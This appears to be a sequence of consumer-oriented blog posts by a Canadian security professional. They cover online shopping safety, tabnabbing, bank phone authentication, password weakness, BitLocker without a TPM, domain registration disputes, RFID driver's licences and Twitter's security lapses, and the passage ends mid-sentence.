I’ve made a lot of online purchases and I often purchase goods online to take advantage of better selection and prices.   For example, I recently ordered a larger drive for my desktop PC.  Newegg and Tiger Direct both had a good product for a good price, and shipping was reasonable considering the cost of gas and my time to go to the store.

I’ve only had two bad online experience, and I got my money back both times.  Yet I continue to hear horror stories from others.  So I thought I’d share my approach.

First and foremost, there is nothing magic about shopping online.  The major difference when you walk into a shop is that you have a good idea where they are located. However, disreputable bricks-and-mortar stores (along with phone and mail order outfits) ripped off consumers for years before the Internet was invented.

So how can we shop online with confidence?

1) Consider ordering from businesses you know.  Saving a few dollars on an unknown vendor may not be worth it.

2) If you’re looking for something and don’t know where to find it, consider using eBay or Amazon. Carefully check feedback on the vendor before buying.

3) Always pay by credit card.  From time to time you may run across vendors who request payment by other means.  They might want to you wire money using Western Union or a similar service.  The problem is that once you’ve sent your money, there is little you can do about it.  Real online merchants accept credit cards or use a service like PayPal that accepts credit cards on their behalf. Period.

4) Understand any rules that apply to disputes.  For example, if you make a purchase on eBay and pay using PayPal you must open a dispute within 45 days.  Be wary of anyone who may be trying to string you along with a series of excuses, delays and apologies.

5) Next to how they treat other customers, the best predictor of how a business will treat you after getting your money is how they treat you before. When shopping online we often have our choice of products and resellers.  When I”m trying to decide, I’ll often email a few vendors to ask their advice or for product information.  The timeliness and quality of their response speaks volumes about them.

Have other words of wisdom to share?  Please comment!

Aza Raskin has an interesting article on his blog about tabnabbing.  In summary,  an attacker can use javascript that sits quietly on a page waiting until it is no longer in the foreground (for example when you have switched to another tab in your browser), and then switches to a legit looking phishing page.  For example, you could be reading a blog, switch to another tab to do something else, and then click on a tab that looks like it is a gmail login — when it is in fact a phishing page.

This is yet another example of why passwords are a really bad idea.  However, from a practical perspective, the best thing you can do is to ensure that you have opened a tab yourself before logging in.  If you click to a tab and find yourself at a login screen, close the tab, open a new one, and navigate to the site you want.

Thanks  to Thorin for the link!

As a security professional, I sometimes struggle with how much information to divulge about security vulnerabilities.  However, by the time it makes YouTube and links circulate in email, my general thought is that criminals already know about it and the benefits of informing the public outweigh the risk.

As you can see in this YouTube video, it is possible to open many residential garage doors using only a simple wedge and a wire hook.  What was intended as a safety feature to allow the door to be opened without power creates a security vulnerability.  Using a plastic cable tie might be the best way to address this, provided that you have a way to cut the cable tie if you need to open the door during a power failure.

Thre’s a good article on weather watches, weather warnings, and you over at The Squid Zone.

In security circles we often discuss why some individuals and businesses find themselves in a perpetual state of high risk. While there can be complex factors, the bottom line is that many of us make poor risk management decisions in our business and personal lives.

Sometimes a high risk position results because we don’t correctly asses asset values, threats or vulnerabilities. Sometimes the cost of implementing a safeguard exceeds and expected loss, and the decision to accept risk is a logical one. And sometimes we simply make mistakes.

But there are other reasons that we Canadians are often too polite to point out: Laziness, denial, rationalization and risk decisions based upon emotion rather than logic.  The H1N1 ‘flu gives us plenty of examples.

We’re in the midst of an influenza pandemic.  Fortunately we know how to create ‘flu vaccines — we do it every year to combat the seasonal flu. So we have a vaccine, and every credible organization from the World Health Organization down to our local medical officers are recommending that we vaccinate ourselves and our families.

The risk is clear: pH1N1 is a nasty virus that, at best, will make you sick for a week or two.  At worst, it could kill you. The threat is real and much of resulting risk can be mitigated by a simple vaccination.  The Public Health Agency of Canada advises that, “without interventions like a vaccine and antivirals, close to 25 to 35 percent of the population could become ill over the period of a few months.”  Other health organizations have released similar estimates. The vaccine has been tested in Canada as well as other countries, and we know that approximately 1 in 100,000 people will have a serious reaction to it, as with any other vaccine.  (Source: http://www.phac-aspc.gc.ca/alert-alerte/h1n1/vacc/options-eng.php)

From a risk management perspective it doesn’t get much simpler than this. The benefits of the vaccine clearly outweigh the risks, and the cost (a few hours of our time at most) is minimal compared to the potential loss.  And that doesn’t take ethics and social responsibility into account.   Those who choose not to be vaccinated not only may become ill, but could also pass H1N1 on to more vulnerable family, friends and colleagues — including those who can’t be vaccinated due to alergies.

As a result, we continue to see people announce on the Internet that they’re not getting vaccinated. Some quote “facts” that are uninformed myths at best.  Some focus on the 1 in 100,000 serious reaction rate and completely loose perspective.  Others ignore a century or so of medical science and proclaim that they don’t need a vaccination because they are “healthy and take their herbs and vitamins.”

Chances are that you’ve already seen the writings of otherwise intelligent parents who are incapable or making good risk management decisions. Their blog posts usually start with how much they love their kids.  Then they latch on to the one quack that chargers people $50 each to attend a seminar to learn “the truth” and rationalize that “the medical community don’t all agree”.  They focus on the danger of mercury in vaccines, even though the exposure is less than you’d get from eating a can of tuna.  Or they repeat silly claims like suggesting that the vaccine is “untested”.

Some of these people obviously have other agendas.  It’s clear from their writing that they’re simply anti-vaccination shills. They write clever “balanced” articles pitting fact against laughable fiction and seek to “support” others who share their defective logic.

Some see themselves as rebells, not “giving in” to the experts who tell them they should be vaccinated.  The old phrase, “Rebells without a clue” comes to mind.

In others, the barrage of H1N1 information creates neurotic behaviour and they operate on a completely emotional level. They “agonize” (often at length and in writing) about how “difficult” the decision was.  They loose all perspective, and should you dare point out the flaws in their reasoning their feelings are hurt. How dare you suggest that they don’t know what’s best. They behave as if the act of conceiving a child instantly made them more knowledgeable on vaccines than the WHO, CDC, and the medical experts of countless countries, including their own. They have “the right” not to vaccinate themselves and their children, and as emotional people often do, they confuse having a right with it being the right thing to do.

We often hear banks complaining loudly about the losses they suffer from payment card fraud.  Campaigns like “Protect your PIN” and humorous commercials with a miniature armoured truck following a customer down the street must cost tens of millions of dollars.

But then consumers still receive calls like I did on Saturday afternoon.  The bank – or someone claiming to be from the bank – called me, advised that they were recording the call, welcomed me as a new customer, and then asked me for my date of birth and postal code, “to confirm they were speaking to the right person.” 

I have a very simple rule: If I call you, it’s reasonable for you to ask me to prove I am who I say I am.  However, if you call me, you get to go first.  And unfortunately, while banks are somewhat good at authenticating their customers, they never seem to consider how customers should authenticate them.

When I declined to provide personal information to the caller, she politely replied that I could call the number on the back of my card if I had any questions and then she ended the call.

So I did just that, and asked about the call.  The CSR verified that the person who called me was indeed from the bank, and that they ask for a date of birth and postal code to make sure they’re speaking with the “right person”. But he didn’t have a solution to how I should authenticate future callers who claim they’re from the bank.

Banks should know better.  Telephoning customers and asking for personal information is irresponsible and contributes to the identity theft problem.  Banks should be telling their customers that they will never call them and ask for personal information – just as they currently do for PIN numbers.

There’s also an obvious solution: The bank could easily add one more field to their database, a password that they will use when they call me. In fact, next time they do call, I think I’ll ask them for their telephone password.

Perhaps the Bank’s security, fraud and marketing people need to have a chat.

Ars Technica has a great article this morning entitled 30 years of failure: the username/password combination.

One of the things that they didn’t discuss is why we continue to use passwords for authentication even though they’re known to be a serious weakness. The first reason is that, as long as we don’t include the cost of a security breach, passwords are free.  The second is that while better authentication technologies exist, nobody seems interested in allowing a single credential to be used across multiple systems on the Internet. I should be able to carry one authentication device and use it everywhere, but instead when we go that route we end up with a key-ring full of devices.

Perhaps it’s time for the open source community to step up to the plate?

I recently installed Windows 7 Ultimate (32 bit) on my brand new HP Mini 110 (it ships with XP). The Windows 7 distribution included all the drivers needed to get the system up and running, including the WiFi drivers, making it a very painless process.  Once running, it automatically downloaded the vendor-specific video driver, resulting in a fully operational system.  The only driver I had to manually install was for the touchpad. The Windows 7 driver worked fine, but I couldn’t use functions like vertical scrolling until I downloaded the software from Synaptics.

I’m a strong proponent of whole disk encryption, especially on portable computers.  The small size and weight of the HP Mini 110 make it an easier target for thieves. However, by default Windows 7 creates two hard drive partitions, a hidden one for boot and recovery, and a second main partition for the operating system. My favourite open source encryption software, TrueCrypt, won’t do whole hard drive encryption on Windows 7…at least not yet. So I decided to give Microsoft’s BitLocker a try.

BitLocker is designed to work on PCs that include a Trusted Platform Module (TPM) chip on their motherboard. BitLocker essentially stores the hard drive encryption key on the TPM and the system can be configured so that users must authenticate to the TPM using a pin in order to boot their computer.

While that’s a nice plan, it doesn’t help those of us who have purchased a computer that doesn’t include a TPM, and I was somewhat disappointed to learn that the HP Mini 110 falls into that category. But searching the web I quickly learned that BitLocker can be used without a TPM chip by making a group policy change. (Detailed information can be found here.) Once the feature is enabled, the BitLocker key can be stored on a USB flash drive.

This scenario is not ideal because the key is not protected – anyone who gets their hands on the USB key can duplicate the key and use either it or the duplicate to boot the computer.  However, it’s certainly better than the alternative, which is to not use hard drive encryption until third-party products catch up with Windows 7. If you protect your USB key like you protect your car keys, it does provide a practical defence against a thief accessing your data.

But if you’re like me, you probably keep your USB flash drive in your briefcase, making it vulnerable to theft along with your laptop.  It’s like leaving your car keys sitting on top of the hood. I mentioned this challenge to a few colleagues, and one of them introduced me to a very cool product from Verbatim, the TUFF-’N'-TINY™ USB flash drive.

Image courtesy of Verbatim

In addition to having the smallest form factor I’ve seen in a USB flash drive, the Tuff-‘N’-Tiny is dust, water, and static discharge resistant.  It also includes a short key ring lanyard, which I highly recommend you use.

BitLocker only requires the USB key during the initial boot sequence, after which it tells you to remove the key, so the Tuff-‘N’-Tiny soon hung on my keychain as the “ignition key” for my HP Mini.

The Tuff-‘N’-Tiny also includes Verbatim’s V-Safe encryption software.  Unlike many USB devices that mount both a public (unencrypted) and secure (encrypted) partition, V-Safe switches the user between the unencrypted and encrypted partition on the same driver letter.  At first this seemed a bit unusual, but I quickly realized that, in addition to requiring only one drive letter for the device, this scheme also prevents the user from accidentally saving sensitive files to the unencrypted partition. Once you’ve entered your passphrase, only the encrypted partition is available.

Getting back to BitLocker, I think we’ll all agree that it is best used with a TPM chip.  However, while not perfect from a security perspective, it is possible to use Windows 7 BitLocker for pratical whole hard drive encryption without a TPM chip provided that you store the USB key separate from the computer. And so far, at least for me, attaching a small USB flash drive to my keychain appears to be the best option.

The events Monday night in Toronto have the media and net buzzing.  (If you haven’t read about it yet, this Toronto Star article will get you started). While facts, opinions, observations, and premature conclusions dribble out in response to seemingly insatiable public curiosity, there is a question few are asking: What would you do?

Incidents like this are complex and journalists have a difficult job. The facts are difficult to ascertain and they must try to make sense of what they can learn. Only one person could have told us, for a fact, exactly what happened on Monday night. Unfortunately he was allegedly intoxicated at the time and died shortly afterward. The other party obviously knows the details of his own involvement, but not the history. And since he’s been charged with a crime it would be silly for him to discuss it with anyone other than his lawyer.

Many Canadians are under false the impression that our criminal justice system is about determining the truth.  It isn’t.  Truth, if found, is a by-product, not the primary objective.  Our criminal justice system considers only the evidence produced in court. The Crown tries to introduce sufficient evidence to prove guilt beyond a reasonable doubt, while the individual may or may not introduce evidence in support of their innocence. And in the end, the accused is found either “guilty” or “not guilty”.  The verdict of “innocent” doesn’t exist in our system.

Our criminal justice system also operates after the fact. Our laws tell us what we must not do, but rarely provide practical guidance. In fact, they are often such a complex mix of statue and precedent that even lawyers don’t agree on what the law actually is. And when the proverbial fertilizer hits the rotary bladed object, nobody is thinking about that anyway.

I’m not going to contribute to the speculation on what happened. Instead, I’m going to ask you to discard whatever preconceptions you have and consider three hypothetical situations:

1. You’re a police officer called to a minor disturbance. The person who appears to be causing it is somewhat intoxicated and has a bicycle, but hasn’t broken the law, at least not seriously. You determine that he should go home. What would you do?
2. You’re an alcoholic who has fallen off the wagon. The police have told you to go home, you’re riding your bicycle drunk, and you have a minor collision with a guy in a Saab. He’s angry with you and you’re angry with him. You exchange words and he begins to drive away. What would you do?
3. You and your wife are driving home from an anniversary dinner in a convertible. You’re involved in a minor collision with a cyclist.  He doesn’t appear hurt, just angry. Drunk and angry. He picks up his bike and throws it on the ground and slams his bag on your hood. You decide to drive away to end the confrontation, but he chases after your car and grabs on to the driver’s door. What would you do?

We don’t know for sure what happened on Monday, and before we speculate on whether Michael Bryant should be punished for it, we should be asking not only what happened, but also what we would do in his shoes.

A small group of cyclists in Toronto appear very polarized around this event. They’re trying to turn this into a cyclist vs. motorist issue. Understandably, many cyclists feel that drivers don’t respect their right to be on the road and point to this as an example.  On the other hand, many drivers are frustrated by cyclists who on one hand demand to be treated as equals on the road, yet ignore the rules of the road when it suits them. Then there are those of us who have driven cars, trucks, bicycles and motorcycles – and we’ve literally seen it from all angles.

While the dialog that may ensue about how motorists and bicycles can best share the road might prove productive, that’s not what this case is about. They’re separate issues. This case is about two men who had an encounter that I wouldn’t wish on anyone. One of them, Michael Bryant, stands charged with a crime and at best will be forced to spend a small fortune to defend himself. The other, Darcy Allan Sheppard, is dead.

And the question remains:  What would you do?

By now most of us know that when we delete a file from our computer it isn’t really gone – the space is merely marked as being available for reuse. Unlike in the physical world, where we can easily shred or burn documents we wish to dispose of (and put the others out in the same trash bag as the kitchen waste and used kitty litter) it’s relatively hard to do the same on our PCs.

If our operating systems and applications were designed with privacy in mind, we could simply tell them that we don’t want to retain any browsing history, that our web cache and cookies should be deleted when we close our browser, that we aren’t interested in being presented with a list of our most recently used files, and that the last date/time a file was read isn’t necessary information.  We could also tell it to overwrite disk space when it’s done with it.

The technical reasons behind some of these issues were originally performance related, but given the speed of computers these days, there is no good reason that our computer needs to keep notes on what we’ve been using it for.

Of course when one brings up these issues, there are those who ask, “What do you have to hide?”  Child pornography is an often-quoted example of why computer forensics is a good thing, and I certainly agree that child pornographers should receive an express ticket to jail (or worse).  But I’m not willing to give up fundamental privacy rights and live in digital glass houses in order to make it easier to catch criminals.

I’ve written before about hard drive encryption, and full drive encryption remains the best way to safeguard your privacy.  The enhanced BitLocker functionality in Windows 7 combined with the TPG chip in many new computers are a move in the right direction. The open source TrueCrypt project is great, but they need to quick adapt to new realities in Windows 7.

Self-encrypting hard drives appear to be a promising technology, but while vendors brag about them, they aren’t readily available and technical information remains marginal at best. If — as a security professional and writer — I can’t get my hands on one to test, I have to conclude that they’re not a viable option at this time.

Then there are software products that perform tasks such as wiping free space and deleting unwanted browser histories.  From a functional security perspective, products like Evidence Eliminator can perform a nice clean-up of your computer, deleting temporary files, browser artefacts, and wiping unused hard drive space to eliminate ‘deleted’ data.  But “Evidence Eliminator” is a really bad idea.

From a security perspective, this product (and to be fair many others in the same category) often creates a bigger problem than it solves:  While they do a good job of removing unwanted data, they also do a fantastic job of creating evidence that you ran “Evidence Eliminator”. It quite amusing to read of people attempting to explain in court that they didn’t delete data pertaining to the matter in front of the court when they ran “Evidence Eliminator”.  By definition, if you’re eliminating evidence, you look guilty.

Ironically, by calling the product “Evidence Eliminator”, the vendor has made performing clean-up tasks that may be quite reasonable in many circumstances look like a criminal act.

Imagine you’re at work and someone you know emails a URL.  You download a file you expect contains something humours and end up with porn on your work computer.  Sure we can discuss why you shouldn’t have downloaded it in the first place, but there are countless scenarios that could result in you having some type of data on your drive that you don’t want.

In the physical world, you could toss it in the shredder bin, take it home and put it in the fireplace, or otherwise dispose of it. We should have the same ability with data.  But it’s just real deletion that we want, not evidence elimination.

On the off chance that enterprising developers are reading, there are two products missing from the market – or at least I can’t find them!

The first is a clean-up product that runs entirely from a USB stick and does not require installation on the PC.  Running it would clean up the hard drive, overwrite browser artefacts, temporary files, wipe free hard drive space, etc. In fact, it would do most of the things that Evidence Eliminator does – except the purpose would be to clean up the computer and protect privacy – not destroy evidence.

The second is an installable package that monitors system use and cleans up after the user automatically.  In short, it would protect privacy by doing what the operating system and applications should offer to do by itself really deleting stuff.

Thoughts?  Questions?  Ideas?

Let’s hear ‘em!

McAfee recently released a comprehensive report on the array of threats facing banks and their customers.  It includes topics such as card skimming, money laundering, the Nigerian 419 fraud, auctions, and online banking.  The report also provides a good overview of current countermeasures.

Highly recommended reading!

The full report is available for download here.

As a security professional, I spend a lot of my time contemplating how to manage security risk in the corporate and government space.  But there is another challenge that greatly interests me:  Protecting the average user.

Unless you have an IT guy or gal in the family, it can be hard to get the right information.  And there are definitely challenges.  For example, check out Justin Foster’s blog post on Keeping Granny Safe.

One of the great tidbits in it is the link to Secuna’s free vulnerability scannersfor home users.  They offer both a web-based and a downloadable package.  I installed the latter on my notebook and it quickly identified a few products on my computer that needed updating.

I’ve been reading up on new products lately and there are certainly some interesting ones out there. But what’s also interesting is that many vendors still include the great security lie in their product literature. 

Sometimes it’s up front, sometimes it’s buried, but it’s easy to spot because it contains a phrase like, “absolutely secure”, “totally secure”, “completely security”, or “military-grade security”.

If a car salesman told us that a model is “totally safe” wouldn’t we just laugh? Why is software somehow different?

Share your questions, views and concerns – comment below or click on “Ask TLP” at the top of the page!

The Internet has been around so long that domain registrations have become a commodity.  The competition is fierce, and margins are small. Registrars compete for your business not only on price, but also on added features like bundled hosting and DNS service. And among the sales tactics is the offer of free domain registrations.

The reality, of course, is that there is no such thing as a free domain registration.  Somebody pays for it.  And while there is nothing wrong with giving a customer a “free” domain when they purchase other services, as one of my colleagues recently found out, ethics among hosting services greatly vary.

My colleague purchased a hosting plan for $5.95 per month with HostPapa.ca that included a free domain.  According to the terms of service posted on their web site, there shouldn’t have been a problem:

“You have all rights to transfer, sell, or modify your domain name to another person or individual. If you decide to sell or transfer your domain name and HostPapa is the domain name registrar, please request our “domain name transfer instructions” by sending an email to support@hostpapasupport.com. We will send you the specific details and information about transfer of ownership.”

But, when my colleague decided to transfer his domain to another registrar, he found out that it wasn’t that straight-forward.  Host Papa had registered the domain in their own name.  In email, he was told,

“The $100.17 you paid upon sign up with HostPapa was for a hosting account. We included a FREE domain as a thank you for creating an account with us. This domain is only free as long as you are a HostPapa customer, hosting the domain on our servers.

If the domain was not free, you would have been charged $126.37 for hosting and a domain purchase. Now that you wish to cancel your services and take your domain away, the invoice I have created for your domain in the amount of $26.20 covers the cost of HostPapa registering this domain on your behalf when you signed up with us.

This is standard for anyone cancelling their account and wishing to retain their domain.”

During his email discussion with them, at one point a representative of HostPapa wrote chillingly, “Legally, the domain name is ours.”

We contacted HostPapa and inquired, and they explained,

“Yes, you can transfer your domain name to another host at a later date, however, there will be a fee of $24.95 + GST for Canadian clients to release the domain, since it’s only free as long as you are hosted by us.”

Your domain name is key to your Internet presence, and losing it can have a significant impact.  Assuming you maintain a backup of your web site, you can easily move to another hosting company if you control your domain.

So what can you do to protect yourself?

First, keep in mind that virtually anyone can become a ‘registrar’ through a simple reseller agreement. The fact that a company can register a domain for you doesn’t provide any indication of business ethics. Search the web, read their agreements carefully, and do your best to check our their reputation.  Be cautious if transferring your domain requires emailing or telephoning support or the description of the process is vague.

Second, check your domains to ensure that they are registered in your (or your company’s) name, not a provider’s.  If you don’t already have a favourite “whois” tool or web site, try allwhois.com. If the domain is not in your name, contact the registrar immediately and ask that it be corrected. If they refuse, indicate that you wish to transfer your domain to another registrar. But keep in mind that as far as the domain registration world is concerned, the owner is the entity listed in the whois database.

Third, consider using a separate registrar from your hosting provider.  If you’re more technically inclined and have a number of domains, you might consider opening your own reseller account with a large registrar like Tucows and becoming your own registrar.  It also might make sense for you to use a third-party DNS provider like dnsmadeeasy.com.  Ideally you want control of your domain information including the contact names, addresses, and DNS servers. Your registrar should allow you to update at least your DNS information through a web-based interface.

Non-profits, co-ops, and other organizations that depend upon volunteers often have challenges when it comes to protecting corporate information assets against individuals who leave the organization. 

For example, I’ve recently been dealing with a situation involving the use of Yahoo Groups.  While it’s a great way to share information with a group of people, here’s what can happen:

1. A volunteer sets up a group on behalf of the corporation, bearing the corporate name.
2. The volunteer runs the group for a while but subsequently decides to leave the role.
3. The volunteer refuses to turn over control of the group to a board member.
4. When pressed on the issue, the volunteer claims that the group is inaccessible because it hasn’t been used for a while.
5. When pressed further, the volunteer deletes the group including all content.

Unethical volunteers (and employees) can create disruptive scenarios. In this case, they have the potential to impact communication with group members and information can be quickly lost. While criminal and civil proceedings can be initiated after the fact, the disruption has already occurred. 

In an ideal world, there would be services available that take these issues into account. For example, one could have multiple administrators and require two of them to approve sensitive transactions.  But until services like that exist, your best defence is to recognize what can happen, ensure that someone other than the group administrator has a copy of all documents and maintains a list of participant’s email addresses so that they can be contacted if an issue arises.

Have another suggestion?  Please comment and let me know!

There’s a lot of information about the Payment Card Industry Data Security Standard (PCI DSS) on the Internet, but if you’re looking for a good overview, check out eNable’s Quick Guide to PCI Compliance video.  Their fifteen minute presentation is both technically correct and presented in language that anyone can understand – a refreshing change from many security presentations.

If you accept credit cards, you’re required to comply with the PCI DSS standard. There are ways to simplify PCI compliance requirements, especially for small businesses, but it all starts with understanding what those requirements are.  If you business accepts credit cards, you owe it to yourself to watch this video.

One of the reasons that security programs aren’t always as effective as they should be is that organizations of all sizes often fail to ask the most important question: What is security?

Security is often categorized as physical security, personnel security and information security. Much of the reason is historical.  Back before computers, corporate security people were concerned primarily with physical assets.  The area of personnel security evolved with background checks and security clearances and then expanded into workplace violence prevention and ensuring the safety of employees at work and when they travel.

Then computers came along, and the complexity of these new systems gave birth to “computer security”.  Over time the “computer” field became known as “information technology” and “computer security” became “information technology security”.  Some time after that it finally dawned on people that the focus should be protecting information (as opposed to “information technology”) and since then the term “information security” has increased in popularity.

Within the information security field, the buzz phrase, “Confidentiality, Integrity, and Availability” describes its goals:  Protecting information against unauthorized disclosure, ensuring that it is not inappropriately modified and making sure that authorized user can actually use it.  Every so often somebody (commonly a vendor representative trying to push their product) tries to expand this definition by adding a fourth or fifth, but in doing so they usually succeed only in proving that they don’t understand information security.

In some organizations different people or groups are responsible for different “types” of security.  They often use different language, different processes and their failure to co-ordinate activities often increases security risks.

So what is this security thing anyway?  Security is simply about protecting assets.

Physical security is about protecting company assets.  But so is personnel security.  While I’m certainly not suggesting that a company owns employees, they are assets.  Their ability and willingness to work is of great value to the company – without them very little could get done.  If a company fails to protect employees, and they are unable to work, that constitutes a loss.  Failure to comply with laws and regulations regarding the protection of employees also impacts other assets including employee and public relations and monetary losses due to fines or civil damages. All political correctness aside, employees are valuable assets that require protection.

Finally, there’s “information security”.  Today information is an asset.  While computers and networks can be complex, and different skills are required to protect digital information, in the end it’s all really just about protecting assets.

During the last decade a lot of money has been spent trying to protect information systems. Firewalls, intrusion detection systems, two-factor authentication and other technical controls sometimes make good business sense when applied as part of comprehensive security program.  But what we’re not good at yet is the human firewall.

Scott Wright, an Ottawa-based security consultant and publisher of securityviews.com explained,

“Despite having spent 12 years working with constantly improving security technologies, I’ve seen an increasing trend toward generally greater risk and losses to businesses and home computer users. All signs point to the human factors as being the weakest link. It doesn’t matter how well you make the valve in a rubber tire to keep the air in, if the rubber is not consistently good quality, it can be easily punctured. So, I felt that it was important to start working on this problem in an innovative way that had a chance of making a difference in effecting cultural change across an entire organization.”

In addition to speaking and writing on security awareness, Wright also conducted some interesting research:

“The Honey Stick Project was originally devised as a way to gather data about how well people handled a simulated risk scenario – that of an infected USB Flash Drive. Because these devices can contain targeted threats or viruses that can evade common anti-virus programs, people should not plug unidentified USB drives they find in public locations into their computers at work or at home. In fact, it’s a good idea to only use your own device, and not share it with other people, to reduce the risk of infection.

The devices contain simple and safe HTML files with no active programs. I rely on people simply double-clicking on a file when the device is plugged into their computer to load the file. As long as they are connected to the Internet, and the user hasn’t taken any precautions to prevent the the browser from starting, an event is logged at my web server. After deploying 50 devices in places like Ottawa, Toronto, Tremblant and Las Vegas, over 60% of them have been used, which indicates that the finder didn’t do anything to prevent their computer from becoming infected. This tells me that at least 60% of the people who find these devices make poor risk decisions that could result in their home or office computer becoming infected with a virus or botnet.”

Perhaps it’s time we put more emphasis on security awareness training?

Starting today, Passports or Enhanced Driver’s Licences will be needed to drive across the Canada/US border. I don’t have any issue with requiring proof of identity and citizenship to cross an international border, and I really like the concept of offering a wallet-size alternative to the passport. But adding RFID to that wallet-sized card is a bad idea.

If you’re a Canadian citizen, reside in Ontario, and have a driver’s licence you now have the option of paying an additional $40, attending an interview, and obtaining an Enhanced Driver’s Licence that will be accepted in lieu of a passport when driving across the boarder. Within the card is an RFID chip so that you can hold it up to a reader, and by the time you reach the border agent they’ll have your information on their screen. According to the Government of Ontario web site, the RFID chip only sends a unique identifier and not your personal information. The Canadian and US governments then allow each other to access their databases. Using a unique identifier is much better than, for example, allowing anyone with a RFID reader to directly obtain your name, address, etc. However, those citizens who choose to obtain an Enhanced Driver’s Licence will be carring an RFID chip with them almost everywhere they go. And it can be read at least 10m way by anyone with the right equipment.

Today the technology is new, readers are expensive and few people have the cards. But imagine what might happen if they become popular in a few years:

On Sundays, you go to your favourite store. The RFID reader at the door logs your entrance, and readers strategically located around the store track your movement. You pay for your purchase with cash, but a reader at the register associates your unique identifier with the details of your purchase. A few months later you don’t have cash with you and you use your credit card. Now they add your name. The next week they’re taking a survey and ask your postal code, and it is added to the database. A year goes by and in a moment of weakness you fill in an application for a store loyaly card. The information you supply is added to the database. Later the store is purchased by another company that also has customer database, and they combine the data.

What we often fail to consider is that the ability to uniquely identify an individual allows us to build a database and leverage that information both before and after the event. In many cases we choose to provide information, and that’s ok. But adding technology that allows anyone with an RFID reader to start collecting it is a bad idea.

Personally, I’ll stick to my passport and only carry it when I travel.

What’s your plan?

I’ve been avoiding writing about pandemic planning for a while because there has simply been too much hype.  But there is a positive side to all this:  Companies, through their pandemic planning, are hopefully making workplaces safer and taking a look at their business continuity plans.

Every year we have “flu season”.  And every year we have people show up at work with the flu as if doing show displays their dedication.  In reality, they’re spreading a virus to their colleagues. Hopefully employers are looking at the bigger picture and making simple policies such as prohibiting employees with a fever from entering any company facility.

The larger picture is business continuity planning.  There are countless reasons why employees may not be able to come to the workplace:  Illness (the employee, a family member or fear of contact with ill colleagues), power failures, protests, floods, severe weather and other natural disasters. While firms in the manufacturing sector may have to shut down, many others could, with the right planning, sustain operations with employees working remotely.

How well prepared is your company?

There’s a great poster over at Despair Inc. that reads,

“It could be that the purpose of your life is only to serve as a warning to others.”

In the security field we strive to keep our employers and clients out of that category.  However, reality is such that we often learn best from our mistakes and those of others.  As any parent can attest, even the best warning about the potential danger involved in a childish act of stupidity doesn’t come close to the educational impact of falling, or watching one’s friend fall, flat on their face.

Last week I wrote about a security breach at Twitter that resulted from a poor security design.  The kindest thing I can say is that Twitter managed to ignore more than thirty years of security knowledge and made a design error that I would expect a junior security consultant to pick up in a matter of minutes.

Don’t get me wrong — I’m a huge fan of Twitter.  The basic concept behind their service isn’t new, but their timing, marketing and some of their technical decisions are brilliant. But, as much as it pains me to say this about any company, they are making the same critical mistake that has plagued many startups in the Internet space: They obviously lack competent security expertise.

I’m sure that they mean well, and I’m sure Twitter has some very talented developers that really want to do the right thing.  I’m sure that they have considered some aspects of security.  But they need more.  They need a security pro sitting around the development table.  They need to critically examine every aspect of their system from a security perspective.  And they desperately need a good security risk assessment.

Take, for example, my experience with Twitter last week. On Tuesday they announced the ability to send updates via SMS to Rogers phones. I found out because my phone suddenly started getting SMS messages. I replied with “off” and it stopped.  Wednesday the exact same thing happened again.  “Off” worked, and I logged in via the web to make sure it was really turned off. 

Thursday morning it was back with a vengeance. I was driving to the office and a flood of messages began.  Having worked on an SMS project, I knew that mobile phone companies require systems that use SMS to honour the ‘stop’ command.  As soon as a mobile phone subscriber sends ‘stop’ the service provider is supposed to reply with an acknowledgement and not send any further messages.  So I replied with ‘stop’.  Twitter sent an acknowledgement, but messages continued to flood in.  At first I assumed there must be a queue somewhere, but an hour later I was still being flooded with so many messages that my phone was almost useless.

I logged into Twitter and tried to turn off the SMS updates.  But the system gave me an error and continued to show the updates as ‘on’.  Next I tried to delete the phone.  Given that the Twitter ‘Devices’ page displayed my mobile phone number, that should have been easy.  But in response to the ‘delete’ button Twitter replied that there was no valid device to delete.

I opened a support case and while waiting found that the ‘sleep’ function would still work. I temporarily managed to get messages under control by telling Twitter that I sleep 23 hours per day.  About 10 hours into the incident, I received a reply from Twitter support indicating that they couldn’t resolve the issue and had escalated it.  Some time after that they managed to delete my phone from the system.

From a security perspective, a few things went wrong.  First and foremost, the system is clearly not designed to gracefully handle database inconsistencies.  I don’t know how Twitter’s database works.  Presumably it’s large and complex due to the sheer volume of data it handles.  But if the system can display your telephone number and not delete it, sometime is very wrong.

In a perfect world, databases maintain internal consistency.  But we don’t live in a perfect world, and all sorts of strange things can happen in a database.  From a security perspective (as well as an operational one), we need to accept this fact and design for it.

When it comes to any type of communications system, we must recognize that system failures do occur.  For example, radio systems often have timers to shut down the transmitter in the event that a person, computer, or stuck microphone attempts to transmit for a long period of time. When designing an SMS gateway, we similarly need to recognize that database issues or queuing problems could potentially result in a large quantity of undesired messages being sent to a mobile phone.  To protect both both the organization and the user, the system should be designed to tolerate these failures gracefully.  And when the user sends ‘stop’, the system must ensure that the messages do indeed stop.

Then there’s the helpdesk issue.  Twitter is a free service, and we all understand that free services can’t always provide immediate technical support.  But Twitter doesn’t give the user any way to indicate the severity of the issue.  A ten hour response time to most support requests is fine – but when Twitter is malfunctioning and slamming a user with SMS messages it is woefully inadequate.

Part of a security risk assessment involves asking difficult questions about internal and external threats.  It requires considering what can go wrong and determining the potential consequences. It involves exploring scenarios like, “What happens if one of our executive’s email accounts is hacked?” and “What could cause the system to go berserk and start flooding users with messages?”

Good security is about much more than checking a user’s password.  It’s about achieving a holistic understanding of the system’s confidentiality, integrity and availability properties.  It’s about understanding what can go wrong and how to design and operate  the system to minimize the risk. And ultimately it is about protecting the organization’s bottom line.

If Twitter wants to avoid serving as a warning to others, they need to start taking security much more seriously.  They need to find about $50,000 in their budget for a proper risk assessment.  Then they need to start incorporating security requirements into their software development lifecycle. Investors may be desperate for a good start-up these days, but they understand that security breaches, especially those that reveal questionable security competencies, are bad for business. And in the fickle word of social media, they can be fatal.

Twitter was a buzz again last week due to another security breach.  In summary, a criminal claims to have obtained access to a Twitter administrator’s Twitter password by guessing the secret question to reset the administrator’s password on a Yahoo e-mail account. Twitter confirmed that the intruder gained access to information on ten accounts including those of some celebrities.

My question is this:  How many passwords have to be compromised before we all finally come to the consensus that passwords are a really bad idea?

There are three ways to authenticate someone:

• Something they know (a password);
• Something they have (a physical device); and,
• Something they are (biometrics).

Each of these ‘three ways’ is called a factor. If you want to ensure that someone is who they say they are, simply use two of the above factors for a strong authentication. For example, have the person type in a password and something else, like insert a smart card or type in a 6 digit number that proves they have a specific peice of hardware with them.

The problem with passwords is threefold:

